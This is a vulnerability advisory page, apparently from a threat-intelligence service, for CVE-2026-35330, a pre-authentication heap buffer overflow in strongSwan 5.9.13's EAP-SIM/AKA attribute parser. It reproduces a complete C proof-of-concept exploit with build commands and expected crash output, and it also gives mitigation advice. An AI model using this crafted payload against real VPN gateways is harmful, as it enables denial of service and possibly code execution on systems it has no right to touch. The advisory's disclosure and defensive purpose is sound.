strongSwan 5.9.13 - libsimaka EAP-SIM/AKA heap buffer overflow
A heap buffer overflow vulnerability exists in the libsimaka component of strongSwan version 5. 9. 13, affecting EAP-SIM/AKA processing. This vulnerability can be exploited remotely and has publicly available exploit code written in C. No patch or official remediation information is currently provided.
AI Analysis
Technical Summary
CVE-2026-35330 describes a heap buffer overflow in the libsimaka library of strongSwan 5.9.13, specifically impacting EAP-SIM/AKA authentication protocols. The vulnerability allows remote attackers to potentially cause memory corruption via crafted input. Exploit code is publicly available in C, indicating proof-of-concept or exploit development. No affected versions beyond 5.9.13 are specified, and no vendor advisory or patch information is currently known.
Potential Impact
Successful exploitation of this heap buffer overflow could lead to memory corruption, which may result in denial of service or potentially arbitrary code execution depending on the context of use. The vulnerability is remotely exploitable via the EAP-SIM/AKA protocol handling in strongSwan 5.9.13. There is no indication of active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider limiting exposure of strongSwan 5.9.13 instances to untrusted networks or disabling EAP-SIM/AKA authentication if feasible.
Indicators of Compromise
- exploit-code: * Exploit Title: strongSwan 5.9.13 - heap buffer overflow * Date: 2026-05-13 * Exploit Author: Lukas Johannes Moeller * Vendor Homepage: https://www.strongswan.org/ * Software Link: https://download.strongswan.org/strongswan-5.9.13.tar.bz2 * Version: strongSwan <= 5.9.13 (eap-sim or eap-aka plugin built) * Tested on: Debian 12 bookworm, libsimaka.so.0.0.0 + libstrongswan.so.0.0.0 * from upstream strongswan-5.9.13 tarball (no distro patches). * CVE: CVE-2026-35330 * References: * https://github.com/strongswan/strongswan/commit/aa5aaebc33 * https://nvd.nist.gov/vuln/detail/CVE-2026-35330 * https://github.com/JohannesLks/CVE-2026-35330 * * Description: * parse_attributes() in src/libsimaka/simaka_message.c computes * attribute data length as `hdr->length * 4 - 4` without guarding * against `hdr->length == 0`. For length == 0 the validation * `hdr->length * 4 > in.len` evaluates `0 > in.len` (false on any * non-empty input), so the check passes. The chunk length then * underflows to (size_t)0xFFFFFFFFFFFFFFFC and is passed to * add_attribute(), which performs `malloc(sizeof(attr_t) + data.len)` * -> `malloc(16 + 0xFFFFFFFFFFFFFFFC)` -> a 12-byte allocation, * followed by an oversized memcpy. Under ASan this is a clean * heap-buffer-overflow WRITE; under glibc it is an immediate * SIGSEGV inside production code as soon as memcpy walks off the * end of the 12-byte chunk into unmapped memory. * * The bug is pre-auth: an EAP-SIM/AKA payload reaches * parse_attributes() inside IKE_AUTH before any peer authentication * has completed. * * Build: * gcc -fsanitize=address -g -O0 \ * -I/path/to/strongswan-5.9.13/src/libsimaka \ * -I/path/to/strongswan-5.9.13/src/libstrongswan \ * -include /path/to/strongswan-5.9.13/config.h \ * strongswan-5.9.13-libsimaka-eap-sim-aka-overflow.c \ * -L/usr/lib/ipsec -Wl,-rpath,/usr/lib/ipsec \ * -lsimaka -lstrongswan -o sim-aka-oob * * (The /usr/lib/ipsec rpath points the loader at the installed * strongSwan libraries. Headers come from the source tree because * simaka_message.h is not installed system-wide.) * * Run: * ./sim-aka-oob * * Expected output on a vulnerable strongSwan (<= 5.9.13): * AddressSanitizer: heap-buffer-overflow ... WRITE of size 8 * #0 ... in __asan_memcpy * #1 ... in parse_attributes ... simaka_message.c * #2 ... in parse ... simaka_message.c * #3 ... in main ... this file * * Without ASan you should see a SIGSEGV; on a patched strongSwan * (master >= aa5aaebc33) parse() returns FALSE and the program * prints "parse() returned FALSE (patched)". * * Disclaimer: * For authorized testing and defensive research only. Do not use * against systems you do not own or have explicit permission to * test. */ #include <stdio.h> #include <stdlib.h> #include <string.h> #include <stdint.h> #include <arpa/inet.h> #include <library.h> #include <utils/chunk.h> #include <simaka_message.h> /* EAP codes (RFC 3748) */ #define EAP_REQUEST 1 #define EAP_RESPONSE 2 /* EAP types */ #define EAP_TYPE_SIM 18 /* EAP-SIM subtypes (RFC 4186) */ #define SIM_CHALLENGE 11 /* EAP-SIM/AKA attribute types (RFC 4186 / RFC 4187) */ #define AT_RAND 1 int main(void) { chunk_t data; simaka_message_t *msg; uint8_t payload[12]; if (!library_init(NULL, "exploit-35330")) { fprintf(stderr, "[!] library_init() failed\n"); library_deinit(); return 1; } /* * EAP-SIM header (8 bytes): * byte 0: code = 2 (EAP_RESPONSE) * byte 1: id = 0x42 * bytes 2-3: length = htons(12) * byte 4: type = 18 (EAP-SIM) * byte 5: subtype = 11 (SIM_CHALLENGE) * bytes 6-7: reserved * * AT_RAND attribute header (4 bytes): * byte 8: type = 1 (AT_RAND) * byte 9: length = 0 <-- triggers underflow: * hdr->length * 4 - 4 = -4 -> SIZE_MAX-3 * bytes 10-11: reserved */ payload[0] = EAP_RESPONSE; payload[1] = 0x42; payload[2] = 0x00; payload[3] = 12; payload[4] = EAP_TYPE_SIM; payload[5] = SIM_CHALLENGE; payload[6] = 0x00; payload[7] = 0x00; payload[8] = AT_RAND; payload[9] = 0; /* the bug */ payload[10] = 0x00; payload[11] = 0x00; data = chunk_create(payload, sizeof(payload)); printf("[*] payload (%zu bytes): ", data.len); for (size_t i = 0; i < data.len; i++) { printf("%02x ", payload[i]); } printf("\n[*] EAP-SIM header: code=RESPONSE id=0x42 len=12 type=SIM subtype=CHALLENGE\n"); printf("[*] AT_RAND header: type=1 length=0 <-- triggers underflow\n\n"); msg = simaka_message_create_from_payload(data, NULL); if (!msg) { fprintf(stderr, "[!] simaka_message_create_from_payload() returned NULL" " -- header rejected\n"); library_deinit(); return 2; } printf("[*] simaka_message_create_from_payload() -> %p\n", (void*)msg); printf("[*] calling msg->parse(msg) --" " expecting heap-buffer-overflow inside parse_attributes()...\n"); fflush(stdout); if (msg->parse(msg)) { printf("[?] parse() returned TRUE -- unexpected\n"); } else { printf("[+] parse() returned FALSE (patched) -- attribute rejected\n"); } msg->destroy(msg); library_deinit(); return 0; }
strongSwan 5.9.13 - libsimaka EAP-SIM/AKA heap buffer overflow
Description
A heap buffer overflow vulnerability exists in the libsimaka component of strongSwan version 5. 9. 13, affecting EAP-SIM/AKA processing. This vulnerability can be exploited remotely and has publicly available exploit code written in C. No patch or official remediation information is currently provided.
AI-Powered Analysis
Machine-generated threat intelligence
Technical Analysis
CVE-2026-35330 describes a heap buffer overflow in the libsimaka library of strongSwan 5.9.13, specifically impacting EAP-SIM/AKA authentication protocols. The vulnerability allows remote attackers to potentially cause memory corruption via crafted input. Exploit code is publicly available in C, indicating proof-of-concept or exploit development. No affected versions beyond 5.9.13 are specified, and no vendor advisory or patch information is currently known.
Potential Impact
Successful exploitation of this heap buffer overflow could lead to memory corruption, which may result in denial of service or potentially arbitrary code execution depending on the context of use. The vulnerability is remotely exploitable via the EAP-SIM/AKA protocol handling in strongSwan 5.9.13. There is no indication of active exploitation in the wild at this time.
Mitigation Recommendations
Patch status is not yet confirmed — check the vendor advisory for current remediation guidance. Until an official fix is available, consider limiting exposure of strongSwan 5.9.13 instances to untrusted networks or disabling EAP-SIM/AKA authentication if feasible.
Technical Details
- Cve
- CVE-2026-35330
- Edb Id
- 52587
- Has Exploit Code
- true
- Code Language
- c
Indicators of Compromise
Exploit Source Code
Exploit code for strongSwan 5.9.13 - libsimaka EAP-SIM/AKA heap buffer overflow
* Exploit Title: strongSwan 5.9.13 - heap buffer overflow * Date: 2026-05-13 * Exploit Author: Lukas Johannes Moeller * Vendor Homepage: https://www.strongswan.org/ * Software Link: https://download.strongswan.org/strongswan-5.9.13.tar.bz2 * Version: strongSwan <= 5.9.13 (eap-sim or eap-aka plugin built) * Tested on: Debian 12 bookworm, libsimaka.so.0.0.0 + libstrongswan.so.0.0.0 * from upstream strongswan-5.9.13 tarball (no distro patches). * CVE: CVE-2026-35330 * Referenc... (4992 more characters)
Threat ID: 6a1a0debe29bf47b5017f680
Added to database: 5/29/2026, 10:06:35 PM
Last enriched: 5/29/2026, 10:07:24 PM
Last updated: 5/29/2026, 11:07:03 PM
Views: 4
Community Reviews
0 reviewsCrowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.
Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.
Actions
Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.
Need more coverage?
Upgrade to Pro Console for AI refresh and higher limits.
For incident response and remediation, OffSeq services can help resolve threats faster.
Latest Threats
Check if your credentials are on the dark web
Instant breach scanning across billions of leaked records. Free tier available.